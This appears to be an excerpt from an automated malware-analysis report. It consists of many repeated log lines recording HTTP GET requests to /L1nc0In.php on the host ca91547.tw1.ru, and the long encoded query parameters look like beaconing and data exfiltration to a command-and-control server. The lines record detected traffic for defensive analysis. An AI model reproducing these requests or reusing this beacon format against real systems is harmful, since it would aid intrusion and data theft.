yMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp